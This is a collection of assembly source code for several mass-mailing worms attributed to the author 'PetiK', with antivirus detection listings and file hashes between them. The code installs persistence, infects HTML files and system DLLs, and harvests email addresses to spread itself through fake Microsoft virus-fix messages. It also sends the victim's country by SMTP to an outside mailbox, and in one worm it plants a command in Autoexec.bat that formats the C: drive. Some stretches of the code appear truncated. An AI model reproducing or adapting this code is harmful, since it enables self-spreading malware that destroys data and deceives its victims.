dd offset mFrom
dd 1
dd offset mTo
dd 1
dd offset attach
subject db "Important and confidential information about...",00h

body db "...the powerfulest man of the world.",0dh,0ah
db "Look at this attachment to better know this man.",0dh,0ah,0dh,0ah
db "Visit his site (www.georgewbush.com) on Wednesday.",0dh,0ah,0dh,0ah
db 09h,"Best Regards",00h
date db "07/01/2001",00h
sender db "webmaster@rnc.org",00h
mFrom dd ?
dd ?
dd offset mFrom
dd offset sender
dd ?
dd ?
mTo dd ?
dd 1
dd offset mTo
dd offset m_addr
dd ?
dd ?
attach dd ?
dd ?
dd ?
dd offset szCopieb
dd ?
dd ?
vbsd:
db 'Set f=CreateObject("Scripting.FileSystemObject")',0dh,0ah
db 'Set w=CreateObject("WScript.Shell")',0dh,0ah
db 'If not f.FileExists (f.GetSpecialFolder(0)&"\Carnet.txt") Then',0dh,0ah
db 'Set cr=f.CreateTextFile(f.GetSpecialFolder(0)&"\Carnet.txt")',0dh,0ah
db 'cr.Close',0dh,0ah
db 'End If',0dh,0ah
db 'Set OA=CreateObject("Outlook.Application")',0dh,0ah
db 'Set MA=OA.GetNameSpace("MAPI")',0dh,0ah
db 'For each A In MA.AddressLists',0dh,0ah
db 'If A.Addressentries.Count <> 0 Then',0dh,0ah
db 'For B=1 To A.AddressEntries.Count',0dh,0ah
db 'Set C=A.AddressEntries(B)',0dh,0ah
db 'If w.RegRead ("HKCU\Software\Bush\" & C.Address) <> "OK" Then',0dh,0ah
db 'Set car=f.OpenTextFile(f.GetSpecialFolder(0)&"\Carnet.txt", 8, True)',0dh,0ah
db 'car.WriteLine """mailto:" & C.Address & """"',0dh,0ah
db 'car.Close',0dh,0ah
db 'w.RegWrite "HKCU\Software\Bush\" & C.Address,"OK"',0dh,0ah
db 'End If',0dh,0ah
db 'Next',0dh,0ah
db 'End If',0dh,0ah
db 'Next',0dh,0ah

SYSTIME struct
wYear WORD ?
wMonth WORD ?
wDayOfWeek WORD ?
wDay WORD ?
wHour WORD ?
wMinute WORD ?
wSecond WORD ?
wMillisecond WORD ?
SYSTIME ends
end DEBUT
end
File Bush.exe received on 05.16.2009 11:20:57 (CET)

AhnLab-V3 5.0.0.2 2009.05.15 Win32/Peti
Authentium 5.1.2.4 2009.05.15 W32/Petik.B@mm
Avast 4.8.1335.0 2009.05.15 Win32:Petik-Bush
AVG 8.5.0.336 2009.05.15 I-Worm/Petik
BitDefender 7.2 2009.05.16 Win32.Pettick.E@mm
ClamAV 0.94.1 2009.05.15 -
Comodo 1157 2009.05.08 Worm.Win32.Petik.AA
DrWeb 5.0.0.12182 2009.05.16 Win32.Petik.9216
F-Prot 4.4.4.56 2009.05.15 W32/Petik.B@mm
Fortinet 3.117.0.0 2009.05.16 W32/Petik.B@mm
GData 19 2009.05.16 Win32.Pettick.E@mm
Microsoft 1.4602 2009.05.16 Worm:Win32/Petick.E@mm
NOD32 4080 2009.05.15 Win32/Petik.AA
Norman 6.01.05 2009.05.16 W32/Petik.O
nProtect 2009.1.8.0 2009.05.16 -
Panda 10.0.0.14 2009.05.15 W32/Petik.W.worm
PCTools 4.4.2.0 2009.05.15 I-Worm.Petgwb.A
Prevx 3.0 2009.05.16 -
Rising 21.29.52.00 2009.05.16 Worm.Mail.Petik.b
Sophos 4.41.0 2009.05.16 W32/Bush
TrendMicro 8.950.0.1092 2009.05.15 WORM_PET.TICK.E
ViRobot 2009.5.15.1737 2009.05.15 -
VirusBuster 4.6.5.0 2009.05.15 I-Worm.Petgwb.A
MD5...: 1defedea5174374180d660693622fb90
SHA1..: f8047ed4d150dfd6ae9e8fd5cd6146c960570f1b
comment #
Name : I-Worm.MaLoTeYa
Author : PetiK
Date : July 2nd - July 6th
Size : 12288 byte
Action: It copies itself to \WINDOWS\RUNW32.EXE and to \WINDOWS\SYSTEM\MSVA.EXE. It

alters the run= line and creates the VARegistered.htm file in the StartUp folder. This
file send some informations to petik@multimania.com and displays a fake message.
If the version of the platform is Windows 95/98, the file is a service process.
It infects all *.htm and *.html file while writing at the end a VB script. It checks
after if exist a internet connection and scans all *.htm* files in the "Temporary
Internet Files" to find some EMail addreses and send a copy of itself. The worms sends
equally an email to "petik@multimania.com" with the country of the user. When the user
want to see the system properties, the title of the window is changed by "PetiK always is
with you :-)".
Greets to Benny, ZeMacroKiller98, Mandragore.
tasm32 /M /ML Maloteya

tlink32 -Tpe -aa -x Maloteya,,,import32
#
.586p
.model flat
.code
JUMPS
callx macro a
extrn a:proc
call a
endm
include useful.inc
;----------------------------------------
;Installation of the worm in the computer
;----------------------------------------
DEBUT:
VERIF: push 00h
push 50h
push offset szOrig
push eax
push 50h
push offset szCopie
@pushsz "\RUNW32.EXE"
push offset szCopie
callx lstrcat
push 50h
push offset szCopb
@pushsz "\MSVA.EXE"
push offset szCopb
callx lstrcat
push offset szOrig

push offset szCopie
callx lstrcmp
test eax,eax
jz CACHE
COPIE: push 00h

push offset szCopie
push offset szOrig
callx CopyFileA
push 00h
push offset szCopb
push offset szOrig
callx CopyFileA
WININI: push 50
@pushsz "\\WIN.INI"
callx lstrcat
push offset szCopie
@pushsz "run"
@pushsz "windows"
;--------------------------------------------------
;Create VARegistered.htm file in the StartUp folder
;--------------------------------------------------
C_GET: @pushsz "SHELL32.dll"
callx LoadLibraryA
mov SHELLhdl,eax
@pushsz "SHGetSpecialFolderPathA"
push SHELLhdl
mov getfolder,eax
push 00h
push 07h ; STARTUP Folder
push offset StartUp
push 00h
call [getfolder]
test eax,eax
je F_HTM
@pushsz "\VARegistered.htm"
push offset StartUp
callx lstrcat
HTM: push 00h

push 80h
push 02h
push 00h
push 01h
push 40000000h
push offset StartUp
callx CreateFileA
mov [FileHdl],eax
push 00h
push offset octets
push HTMTAILLE
push offset htmd
push [FileHdl]
callx WriteFile
push [FileHdl]
callx CloseHandle
F_HTM: push [SHELLhdl]
callx FreeLibrary
F_MESS: push 1000
callx Sleep
push 1040h
@pushsz "Microsoft Virus Alert"
@pushsz "Your system does not appear infected with I-Worm.Magistr"
push 00h
callx MessageBoxA
jmp FIN
;----------------------------------
;Serivice process for Windows 95/98
;----------------------------------
CACHE: @pushsz "KERMEL32.dll"
@pushsz "RegisterServiceProcess"
push eax
xchg ecx,eax
jecxz D_INF
push 01h
push 00h
call ecx
D_INF: push 50
push offset szCurrent
callx GetCurrentDirectoryA
push offset szCurrent
;---------------------------------------------
;Infect all *.htm* files of the Windows folder
;---------------------------------------------
FFF: push offset Search
@pushsz "*.htm*" ; Search some *.htm* files...
inc eax
je F_INF
dec eax
mov [htmlHdl],eax
i_file: call infect ; and infect them
push offset Search

push [htmlHdl]
callx FindNextFileA
test eax,eax
jne i_file
push [htmlHdl]
callx FindClose
F_INF:
;-----------------------
; Check if we r conected
;-----------------------
NET1: @pushsz "WININET.dll"
callx LoadLibraryA
test eax,eax
jz FIN
mov WNEThdl,eax
push WNEThdl
test eax,eax
jz FIN
mov netcheck,eax
jmp NET2
NET2: push 00h
push offset Temp
call [netcheck] ; Connect to Internet ??
dec eax
jnz NET2
FINNET: push [WNEThdl]
callx FreeLibrary
PAYS: push 50
push offset szSystemini
@pushsz "\Win.ini"
callx lstrcat
push 20
push offset org_pays
push offset Default
@pushsz "sCountry"
@pushsz "intl"
callx GetPrivateProfileStringA
;------------------------------------------------------------------
; Send the name of country to "petik@multomania.com" (perhaps bugs)
;------------------------------------------------------------------
SMTP: push offset WSA_Data ; Winsock
push 0101h ; ver 1.1 (W95+)
callx WSAStartup
or eax,eax
jnz INIT
@pushsz "obelisk.mpt.com.uk"
callx gethostbyname ; convert SMTP Name to an IP address
xchg ecx,eax
jecxz FREE_WIN ; Error ?
mov esi,[ecx+12] ; Fetch IP address
lodsd
push eax
pop [ServIP]
push 00h ; Create Socket

push 01h ; SOCK_STREAM
push 02h ; AF_INET
callx socket
mov work_socket,eax
inc eax
jz FREE_WIN
push 16 ; Sze of connect strucure
call @1 ; Connect structure
dw 2 ; Family
db 0, 25 ; Port number
ServIP dd 0 ; IP of server
db 8 dup(0) ; Unused
@1:
push [work_socket]
callx connect
inc eax
jz CLOSE_SOC
lea esi,Send_M
mov bl,6
Command_Loop: xor eax,eax
call @2 ; Time-out:
Time_Out: dd 5 ; Seconds
dd 0 ; Milliseconds
@2:
push eax ; Not used (Error)
push eax ; Not used (Writeability)
call @3
Socket_Set: dd 1 ; Socket count
work_socket dd 0 ; Socket
@3:
push eax ; Unused
callx select
dec eax
jnz CLOSE_SOC
push 00h
push 512 ; Received data from socket
push offset buf_recv
push [work_socket]
callx recv
xchg ecx,eax ; Connection closed ?
jecxz CLOSE_SOC
inc ecx ; Error ?
jz CLOSE_SOC
or ebx,ebx ; Received stuff was QUIT
jz CLOSE_SOC ; reply ? then close up.
mov al,'2' ; "OK" reply
cmp bl,2 ; Received stuff was the DATA
jne Check_Reply ; reply ?
inc eax
Check_Reply: scasb
je Wait_Ready
lea esi,Send_M + (5*4)
mov bl,1
Wait_Ready:
xor ecx,ecx
lea eax,Time_Out
push eax
push ecx ; not used (Error)
lea eax,Socket_Set
push eax ; Writeability
push ecx ; Not used (Readability)
push ecx ; Unused
callx select
dec eax ; Time-ouit ??
jnz CLOSE_SOC
cld
lodsd
movzx ecx,ax
shr eax,16
add eax,ebp
push ecx ; Send command and data to the socket

push 00h
push ecx ; Size of buffer
push eax ; Buffer
push [work_socket]
callx send
pop ecx
cmp eax,ecx
jne CLOSE_SOC
dec ebx
jns Command_Loop
CLOSE_SOC:
push [work_socket]
callx closesocket
FREE_WIN:
callx WSACleanup
INIT: @pushsz "MAPI32.dll"

callx LoadLibraryA
test eax,eax
jz FIN
mov MAPIhdl,eax
@pushsz "MAPISendMail"
push MAPIhdl
test eax,eax
jz FIN
mov sendmail,eax
D_GET: @pushsz "SHELL32.dll"
callx LoadLibraryA
mov SHELLhdl,eax
push SHELLhdl
mov getfolder,eax
push 00h
push 20h ; MSIE Cache Folder
push offset Cache
push 00h
call [getfolder]
push [SHELLhdl]
callx FreeLibrary
push offset Cache
;-----------------------------------------------------------
; Search email addresses into the "Temporary Internet Files"
;-----------------------------------------------------------
FFF2: push offset Search
@pushsz "*.htm*"
inc eax
je END_SPREAD
dec eax
mov [htmlHdl],eax
i_htm: call infect2

push offset Search
push [htmlHdl]
callx FindNextFileA
test eax,eax
jne i_file
push [htmlHdl]
callx FindClose
END_SPREAD:
push [MAPIhdl]
callx FreeLibrary
;---------------------------------------------------------------
; Changes the title of the System Properties window on Wednesday
;---------------------------------------------------------------
callx GetSystemTime
cmp [SystemTime.wDayOfWeek],3
jne FIN
WIN1: @pushsz "Propriétés Systême"
push 00h
callx FindWindowA
test eax,eax
jz WIN2
jmp WIN3
WIN2: @pushsz "System Properties" ; Change title some windows
push 00h
callx FindWindowA
test eax,eax
jz WIN1
WIN3: mov edi,eax
@pushsz "PetiK always is with you :-)"
push edi
callx SetWindowTextA
jmp WIN1
FIN: push 00h
callx ExitProcess
infect: pushad
mov esi,offset Search.cFileName
push esi
callx GetFileAttributesA
cmp eax,1
je end_infect
push 00h
push 80h
push 03h
push 00h
push 01h
push 40000000h
push esi
callx CreateFileA
xchg eax,edi
inc edi
je end_infect
dec edi
push 02h ; FILE_END
push 00h
push [Dist]
push edi
callx SetFilePointer
push 00h
push offset octets
push HTMSIZE
push offset d_htm
push edi
callx WriteFile
push edi
callx CloseHandle
push 01h ; READONLY
push esi
callx SetFileAttributesA
end_infect: popad
ret
infect2:pushad
push 00h
push 80h
push 03h
push 00h
push 01h
push 80000000h
push offset Search.cFileName
inc eax
je END_SPREAD
dec eax
xchg eax,ebx
xor eax,eax
push eax
push eax
push eax
push 02h ; PAGE_READONLY
push eax
push ebx
test eax,eax
je F1
xchg eax,ebp
xor eax,eax
push eax
push eax
push eax
push 04h ; FILE_MAP_READ
push ebp
callx MapViewOfFile
test eax,eax
je F2
xchg eax,esi
push 00h
push ebx
callx GetFileSize
xchg eax,ecx
jecxz F3
d_scan_mail:
call @melto
db 'mailto:'
@melto: pop edi
scn_mail:
pushad
push 07h
pop ecx
rep cmpsb
popad
je scan_mail
inc esi
loop scn_mail
F3: push esi

F2: push ebp
callx CloseHandle
F1: push ebx
callx CloseHandle
popad
ret
scan_mail:
xor edx,edx
add esi,7 ; size of the string "mailto:"
push edi
p_car: lodsb ; next character
cmp al,' ' ; space ??
je car_s
cmp al,'"' ; end character ??
je car_f
cmp al,'''' ; end character ??
je car_f
cmp al,'@' ; @ character ??
jne not_a
inc edx
not_a: stosb
jmp p_car ; jmp to nxt char
car_s: inc esi
jmp p_car
car_f: xor al,al
stosb
pop edi
test edx,edx ; exist @ ??
je d_scan_mail
call ENVOIE
jmp d_scan_mail
ENVOIE: xor eax,eax
push eax
push eax
push offset Message
push eax
push [MAPIh]
call [sendmail]
ret
.data
namer db 50 dup (0)
szCopb db 50 dup (0)
szCurrent db 50 dup (0)
szSystemini db 50 dup (0)
Cache db 70 dup (0)
StartUp db 70 dup (0)
WSA_Data db 400 dup (0)
buf_recv db 512 dup (0)
Default db 0
FileHdl dd ?
octets dd ?
netcheck dd ?
sendmail dd ?
getfolder dd ?
htmlHdl dd ?
MAPIhdl dd ?
SHELLhdl dd ?
WNEThdl dd ?
RegHdl dd ?
Dist dd 0
Temp dd 0
MAPIh dd 0
WormName db "I-Worm.MaLoTeYa coded by PetiK (c)2001 (05/07)",00h
Origine db "Made In France",00h
Message dd ?
dd offset sujet
dd offset corps
dd ?
dd offset date
dd ?
dd 2 ; MAPI_RECEIPT_REQUESTED ??
dd offset MsgFrom
dd 1 ; MAPI_UNREAD ??
dd offset MsgTo
dd 1
dd offset AttachDesc
MsgFrom dd ?
dd ?
dd offset NameFrom
dd offset MailFrom
dd ?
dd ?
MsgTo dd ?
dd 1 ; MAIL_TO
dd offset NameTo
dd offset m_addr
dd ?
dd ?
AttachDesc dd ?
dd ?
dd ? ; character in text to be replaced by attachment
dd offset szCopb ; Full path name of attachment file
dd ?
dd ?
sujet db "New Virus Alert !!",00h

corps db "This is a fix against I-Worm.Magistr.",0dh,0ah
db "Run the attached file (MSVA.EXE) to detect, repair and "
db "protect you against this malicious worm.",00h
date db "2001/07/01 15:15",00h ; YYYY/MM//DD HH:MM
NameFrom db "Microsoft Virus Alert"
MailFrom db "virus_alert@microsoft.com",00h
NameTo db "Customer",00h
Send_M: dw fHELO-dHELO
dw fFROM-dFROM
dw fRCPT-dRCPT
dw fDATA-dDATA
dw fMAIL-dMAIL
dw fQUIT-dQUIT
dHELO db 'HELO obelisk.mpt.com.uk',0dh,0ah

fHELO:
dFROM db 'MAIL FROM:<maloteya@petik.com>',0dh,0ah
fFROM:
dRCPT db 'RCPT TO:<petik@multimania.com>',0dh,0ah
fRCPT:
dDATA db 'DATA',0dh,0ah
fDATA:
dMAIL: db 'From: "MaLoTeYa",<maloteya@petik.com>',0dh,0ah
db 'Subject: Long Live the Worm',0dh,0ah
db 'Pays d''origine : '
org_pays db 20 dup (0)
db '',0dh,0ah
db '.',0dh,0ah
fMAIL:
dQUIT db 'QUIT',0dh,0ah
fQUIT:
htmd: db "<html><head><title>Virus Alert Registration</title></head>",0dh,0ah

db "<SCRIPT LANGUAGE=""VBScript"">",0dh,0ah
db "Sub control",0dh,0ah
db "dim i",0dh,0ah
db "dim caract",0dh,0ah
db "formu.action=""""",0dh,0ah
db "If formu.mail.value="""" Then",0dh,0ah
db " MsgBox ""Forgotten EMail""",0dh,0ah
db " Else",0dh,0ah
db " For i= 1 to len(formu.mail.value)",0dh,0ah
db " caract=mid(formu.mail.value,i,1)",0dh,0ah
db " If caract=""@"" Then",0dh,0ah
db " Exit For",0dh,0ah
db " End If",0dh,0ah
db " Next",0dh,0ah
db " If caract=""@"" Then",0dh,0ah
db " formu.action=""mailto:petik@multimania.com""",0dh,0ah
db " Else",0dh,0ah
db " MsgBox ""Invalid EMail""",0dh,0ah
db " End If",0dh,0ah
db "End If",0dh,0ah
db "End Sub",0dh,0ah
db "</SCRIPT>",0dh,0ah
db "<body bgcolor=white text=black>",0dh,0ah
db "<p align=""center""><font size=""5"">Microsoft Virus Alert
Registration</font></p>",0dh,0ah
db "<p align=""left""><font size=""3"">Please fill out this form. </font>",0dh,0ah
db "<font>You must be connected to internet.</font></p>",0dh,0ah
db "<p></p>",0dh,0ah
db "<form name=""formu"" action method=""POST"" enctype=""text/plan"">",0dh,0ah
db "<p>Name : <input name=""nom"" type=""TEXT"" size=""40""></p>",0dh,0ah
db "<p>Firstname : <input name=""prenom"" type=""TEXT"" size=""40""></p>",0dh,0ah
db "<p>City : <input name=""ville"" type=""TEXT"" size=""40""></p>",0dh,0ah
db "<p>Country : <input name=""pays"" type=""TEXT"" size=""40""></p>",0dh,0ah
db "<p>E-Mail : <input name=""mail"" type=""TEXT"" size=""40""></p>",0dh,0ah
db "<p><input type=""submit"" value=""Submit"" name=""B1""
onclick=""control""></p>",0dh,0ah
db "<p></p>",0dh,0ah
db "<p align=""center""><font><B>AFTER REGISTRATION YOU CAN DELETE THIS
FILE</B></font></p>",0dh,0ah
db "</form></body></html>",00h
HTMTAILLE equ $-htmd
d_htm: db "",0dh,0ah,0dh,0ah
db "<SCRIPT Language=VBScript>",0dh,0ah
db "On Error Resume Next",0dh,0ah
db "Set fso=CreateObject(""Scripting.FileSystemObject"")",0dh,0ah
db "Set ws=CreateObject(""WScript.Shell"")",0dh,0ah
db "ws.RegWrite ""HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page"",""http://www.petikvx.fr.fm""",0dh,0ah
db "document.Write ""<font face='verdana' color=red size='2'>This file is infected
by my new virus"
db "<br>Written by PetiK (c)2001"
db "<br>HTML/W32.MaLoTeYa.Worm<br></font>""",0dh,0ah
HTMSIZE equ $-d_htm
OSVERSIONINFO struct
dwOSVersionInfoSize dd ?
dwMajorVersion dd ?
dwMinorVersion dd ?
dwBuildNumber dd ?
dwPlatformId dd ?
szCSDVersion db 128 dup (?)
OSVERSIONINFO ends
SYSTIME struct
wYear WORD ?
wMonth WORD ?
wDayOfWeek WORD ?
wDay WORD ?
wHour WORD ?
wMinute WORD ?
wSecond WORD ?
wMillisecond WORD ?
SYSTIME ends
MAX_PATH equ 260
FILETIME struct
dwLowDateTime dd ?
dwHighDateTime dd ?
FILETIME ends
WIN32_FIND_DATA struct
dwFileAttributes dd ?
ftCreationTime FILETIME ?
ftLastAccessTime FILETIME ?
ftLastWriteTime FILETIME ?
nFileSizeHigh dd ?
nFileSizeLow dd ?
dwReserved0 dd ?
dwReserved1 dd ?
cFileName dd MAX_PATH (?)
cAlternateFileName db 13 dup (?)
db 3 dup (?)
WIN32_FIND_DATA ends
OSVer OSVERSIONINFO <>

Search WIN32_FIND_DATA <>
end DEBUT
end
File Maloteya.exe received on 05.16.2009 17:52:03 (CET)
Authentium 5.1.2.4 2009.05.16 W32/Malware!8c02
Avast 4.8.1335.0 2009.05.15 Win32:Petik-Maloteya
AVG 8.5.0.336 2009.05.15 I-Worm/Petik.D
BitDefender 7.2 2009.05.16 Win32.Matoleya.A@mm
CAT-QuickHeal 10.00 2009.05.15 W32.Petik
ClamAV 0.94.1 2009.05.16 Worm.Petik-1
Comodo 1157 2009.05.08 Worm.Win32.Petik.F
DrWeb 5.0.0.12182 2009.05.16 Win32.Petik.12288
eSafe 7.0.17.0 2009.05.14 -
eTrust-Vet 31.6.6508 2009.05.16 Win32/Petik.12288
F-Prot 4.4.4.56 2009.05.16 W32/Malware!8c02
Fortinet 3.117.0.0 2009.05.16 W32/Sabak.A!worm.im
GData 19 2009.05.16 Win32.Matoleya.A@mm
Microsoft 1.4602 2009.05.16 Worm:Win32/Pet_tik.E@mm
NOD32 4080 2009.05.15 Win32/Petik.F
nProtect 2009.1.8.0 2009.05.16 -
Panda 10.0.0.14 2009.05.16 W32/Petik.F
PCTools 4.4.2.0 2009.05.16 VBS.Petik.F
Rising 21.29.52.00 2009.05.16 Worm.Mail.Petik.q
Sophos 4.41.0 2009.05.16 W32/Petik-E
TrendMicro 8.950.0.1092 2009.05.15 WORM_PET.TICK.G
ViRobot 2009.5.15.1737 2009.05.15 I-Worm.Win32.PetTick.12288
VirusBuster 4.6.5.0 2009.05.16 VBS.Petik.F
MD5...: eb7bea183626119bc54c4ab1de80c606
SHA1..: 1f022ad7156e8d510168b7ba441afeb966edb828
comment #
Name : I-Worm.XFW (Extra French Worm)
Author : PetiK
Date : July 10th - August 3th
Size : 5632 byte (compressed with UPX)
Action: It copies itself to \SYSTEM\Services.exe. It adds a value in the run services key
:
"Run Services"="\SYSTEM\Services.exe". It alters the "run=" lines int he WIN.INI
file.
It copies the file WSOCK32.DLL by WSOCK32.PTK and alters the original file while
add
"PetiK" in the file.It displays a message and create a \WINDOWS\Tool_PetiK.txt.
This file explains how repair WSOCK32.DLL.
If the worm is located in the \SYSTEM folder, it searches all DLL files in the
current folder (SYSTEM here) and copies them by the worm while add the ".EXE"
extention.
FILE.DLL ==>> FILE.DLL.EXE
It creates at the end if the computer is connected a VBS file to spread with
Outlook.
To delete : del \WINDOWS\SYSTEM\Wsock32.dll
ren \WINDOWS\SYSTEM\Wsock32.ptk \WINDOWS\SYSTEM\Wsock32.dll
del \WINDOWS\SYSTEM\Services.exe
del \WINDOWS\SYSTEM\*.dll.exe
del \WINDOWS\Tool_PetiK.txt
del in the WIN.INI file after run=
del C:\.vbs
tasm32 /M /ML XFW.asm

tlink32 -Tpe -aa -x XFW.obj,,,import32
upx -9 XFW.exe
.586p
.model flat
.code
;JUMPS
callx macro a
extrn a:proc
call a
endm
include useful.inc
DEBUT: jmp INET

VERIF: push 00h
push 50h
push offset szOrig
push eax
push 50h
push offset szCopie
@pushsz "\SERVICES.EXE"
push offset szCopie
callx lstrcat
push offset szOrig

push offset szCopie
callx lstrcmp
test eax,eax
jz INF_DLL
COPIE: push 00h

push offset szCopie
push offset szOrig
callx CopyFileA ; copy to \SYSTEM\Services.exe
W_INI: push 50
push offset Winini
@pushsz "\\WIN.INI"
push offset Winini
callx lstrcat
push offset Winini
push offset szCopie
@pushsz "run"
@pushsz "windows"
WSOCK: push 50
mov edi,offset a_wsck
push edi
test eax,eax
jz FIN
add edi,eax
mov eax,"OSW\"
stosd
mov eax,"23KC"
stosd
mov eax,"LLD."
stosd
xor eax,eax
stosd ; serach \SYSTEM\Wsock32.dll
push offset a_wsck

push offset n_wsck
callx lstrcat
mov esi,offset n_wsck
push esi
callx lstrlen
add esi,eax
sub esi,4 ; to become \SYSTEM\Wsock32
mov [esi],"KTP." ; and \SYSTEM\Wsock32.ptk
push 01h
push offset n_wsck
push offset a_wsck
callx CopyFileA
test eax,eax
jz FIN
xor eax,eax
push eax
push eax
push 03h
push eax
push eax
push 80000000h or 40000000h
push offset a_wsck
callx CreateFileA
inc eax
jz FIN
dec eax
mov WsckHdl,eax
xor eax,eax
push eax
push eax
push eax
push 04h ; PAGE_READWRITE
push eax
push WsckHdl
test eax,eax
jz FIN2
mov WsckMap,eax
xor eax,eax
push eax
push eax
push eax
push 06h ; SECTION_MAP_WRITE or READ
push WsckMap
callx MapViewOfFile
test eax,eax
jz FIN3
mov WsckView,eax
mov esi,eax
cmp byte ptr [esi+12h],"P"
je FIN3
mov word ptr [esi+12h],"eP"
mov word ptr [esi+14h],"it"
mov byte ptr [esi+16h],"K"
FIN4: push WsckView

FIN3: push WsckMap
callx CloseHandle
FIN2: push WsckHdl
callx CloseHandle
F_MESS: push 10h

@pushsz "Loader Error"
@pushsz "This program will be terminated"
push 00h
callx MessageBoxA
TOOLS: pushad
push 50
push offset windir
@pushsz "\Tool_PetiK.txt"
push offset windir
callx lstrcat
push 00h
push 01h or 20h
push 02h
push 00h
push 01h
push 40000000h
push offset windir
callx CreateFileA
mov edi,eax
push 00h
push offset octets
push TXTSIZE
push offset txtd
push edi
callx WriteFile
push edi
callx CloseHandle
popad
jmp FIN
INF_DLL:
D_INF: push 50
push offset szCurFolder
callx GetCurrentDirectoryA
push offset szCurFolder
FFF: push offset Search
@pushsz "*.dll"
callx FindFirstFileA ; search all DLL files
inc eax
je F_INF
dec eax
mov [htmlHdl],eax
i_file: pushad
mov edi,offset Search.cFileName
push edi
callx lstrlen
add edi,eax
mov eax,"EXE." ; and add .EXE => file.dll.exe
stosd
xor eax,eax
stosd
push 01h
push offset szOrig
callx CopyFileA ; and copies with the main worm
test eax,eax
jz S_P
push offset Search
push [htmlHdl]
callx FindNextFileA
test eax,eax
jne i_file
FC: push [htmlHdl]
callx FindClose
popad
F_INF:
S_P: push offset RegHandle

push 01h
push 00h
push 80000001h
callx RegOpenKeyExA
test eax,eax
jnz FIN
push offset PageSize
push offset Page
push 00h
push RegHandle
push [RegHandle]
callx RegCloseKey
@pushsz "http://www.whitesonly.net"
push offset Page
callx lstrcmp
test eax,eax
jz FORMAT
@pushsz "http://www.kkk.com"
push offset Page
callx lstrcmp
test eax,eax
jz FORMAT
@pushsz "http://www.front-national.fr"
push offset Page
callx lstrcmp
test eax,eax
jz FORMAT
@pushsz "http://www.lepen-tv.com"
push offset Page
callx lstrcmp
test eax,eax
jz FORMAT
@pushsz "http://www.hammerskins.com"
push offset Page
callx lstrcmp
test eax,eax
jz FORMAT
jmp INET
FORMAT: pushad
push 00h
push 20h
push 02h
push 00h
push 01h
push 40000000h
@pushsz "C:\Autoexec.bat"
callx CreateFileA
mov edi,eax
push 00h
push offset octets
push BATSIZE
push offset batd
push edi
callx WriteFile
push edi
callx CloseHandle
popad
jmp FIN
INET: @pushsz "WININET.dll"

callx LoadLibraryA
test eax,eax
jz FIN
mov WNEThdl,eax
@pushsz "InternetCheckConnectionA"
push WNEThdl
test eax,eax
jz FIN
mov netcheck,eax
VNET: xor eax,eax
push eax
push eax
push eax
call [netcheck]
xchg eax,ecx
jecxz VNET
FNET: push [WNEThdl]
callx FreeLibrary
push 40h
@pushsz "Internet"
@pushsz "You're connected"
push 00h
callx MessageBoxA
VBS: pushad
push 00h
push 80h
push 02h
push 00h
push 01h
push 40000000h
@pushsz "C:\Win.vbs"
callx CreateFileA
mov edi,eax
push 00h
push offset octets2
push VBSSIZE
push offset vbsd
push edi
callx WriteFile
push edi
callx CloseHandle
popad
push 01h
@pushsz "wscript C:\Win.vbs"
callx WinExec
push 30 * 1000
@pushsz "C:\Win.vbs"
callx DeleteFileA
FIN: push 00h

callx ExitProcess
.data
; ========== INSTALLATION ==========
a_wsck db 50 dup (0)
n_wsck db 50 dup (0)
Winini db 50 dup (0)
windir db 50 dup (0)
octets dd ?
; ============ INFECTION 1 ===========
WsckHdl dd ?
filesize dd ?
WsckMap dd ?
WsckView dd ?
; ============ INFECTION 2 ===========
htmlHdl dd ?
szCurFolder db 50 dup (0)
; =============== EMail ==============

RegHandle dd ?
Page db 7Fh dup (0)
PageSize dd 7Fh
ValueType dd 0
WNEThdl dd ?
netcheck dd ?
octets2 dd ?
WormName db "I-Worm.XFW coded by PetiK (c)2001 "

Origine db "Made In France",00h
txtd db "To restore Wsock32.dll :",13,10

db "extract /a D:\WIN98\precopy1.cab wsock32.dll /L C:\WINDOWS\SYSTEM",00h
TXTSIZE equ $-txtd
batd db "echo y | format c: /U /V:FuckYou"

BATSIZE equ $-batd
SYSTIME struct
wYear WORD ?
wMonth WORD ?
wDayOfWeek WORD ?
wDay WORD ?
wHour WORD ?
wMinute WORD ?
wSecond WORD ?
wMillisecond WORD ?
SYSTIME ends
MAX_PATH equ 260

FILETIME struct
dwLowDateTime dd ?
dwHighDateTime dd ?
FILETIME ends
nFileSizeHigh dd ?
nFileSizeLow dd ?
dwReserved0 dd ?
dwReserved1 dd ?
db 3 dup (?)

vbsd:
db 'N.To = P.Address',0dh,0ah
db 'N.Subject = "Xtra game for you"',0dh,0ah
db 'N.Body = "This is for you"',0dh,0ah
db 'N.Attachments.Add Q.BuildPath(Q.GetSpecialFolder(1),"Services.exe")',0dh,0ah
db 'N.DeleteAfterSubmit = True',0dh,0ah
db 'N.Send',0dh,0ah
db 'End If',0dh,0ah
db 'Next',0dh,0ah
db 'End If',0dh,0ah
db 'Next',0dh,0ah
VBSSIZE equ $-vbsd
end DEBUT
end
File XFW.exe received on 05.16.2009 20:03:58 (CET)

AntiVir 7.9.0.168 2009.05.15 Worm/Petik.D1
Authentium 5.1.2.4 2009.05.16 W32/Malware!e65e
Avast 4.8.1335.0 2009.05.15 Win32:XFW
AVG 8.5.0.336 2009.05.15 I-Worm/Petik
BitDefender 7.2 2009.05.16 Generic.Malware.Msp!.D18236D7
CAT-QuickHeal 10.00 2009.05.15 -
ClamAV 0.94.1 2009.05.16 Worm.Petik.D2
Comodo 1157 2009.05.08 Worm.Win32.Petik.AB
DrWeb 5.0.0.12182 2009.05.16 Win32.Petik.8192
eSafe 7.0.17.0 2009.05.14 Suspicious File
eTrust-Vet 31.6.6508 2009.05.16 Win32/Petik.5632.C!intended
F-Prot 4.4.4.56 2009.05.16 W32/Malware!e65e
GData 19 2009.05.16 Generic.Malware.Msp!.D18236D7
McAfee+Artemis 5616 2009.05.15 Artemis!CA27691BF213
McAfee-GW-Edition 6.7.6 2009.05.15 Worm.Petik.D1
Microsoft 1.4602 2009.05.16 Worm:Win32/Pet_tik.F
NOD32 4080 2009.05.15 Win32/Petik.AB
Norman 6.01.05 2009.05.16 W32/Petik.AC
Panda 10.0.0.14 2009.05.16 W32/Petik.D
PCTools 4.4.2.0 2009.05.16 I-Worm.Petxfw.A
Rising 21.29.52.00 2009.05.16 Worm.XFW
Sophos 4.41.0 2009.05.16 W32/XfW
TheHacker 6.3.4.1.326 2009.05.15 -
TrendMicro 8.950.0.1092 2009.05.15 WORM_PETIK.F
VirusBuster 4.6.5.0 2009.05.16 I-Worm.Petxfw.A
MD5...: ca27691bf2137dc610588dd9f09de3b2
